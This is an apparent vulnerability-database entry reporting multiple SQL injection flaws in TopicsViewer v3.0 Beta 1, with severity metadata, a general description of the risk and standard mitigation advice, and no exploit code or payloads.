Vendor: TopicsViewer
By: AtT4CKxT3rR0r1ST
CVSS: 8,8 (HIGH)
Multiple SQL Injection
CWE: 89, 89, 89, 89
Product Name: TopicsViewer
Affected Version From: 3.0 Beta 1
Affected Version To: 3.0 Beta 1
Patch Exists: NO
Related CWE: N/A
CPE: a:topicsviewer:topicsviewer:3.0_beta_1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020
TopicsViewer v3.0 Beta 1 – Multiple SQL Injection Vulnerability
Multiple SQL injection vulnerabilities exist in TopicsViewer v3.0 Beta 1 due to improper sanitization of user-supplied input. An attacker can exploit these vulnerabilities by sending specially crafted requests to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands on the underlying database, potentially leading to the disclosure of sensitive information or the modification of data.
Mitigation:
Input validation should be performed to ensure that untrusted data is not used to construct dynamic SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.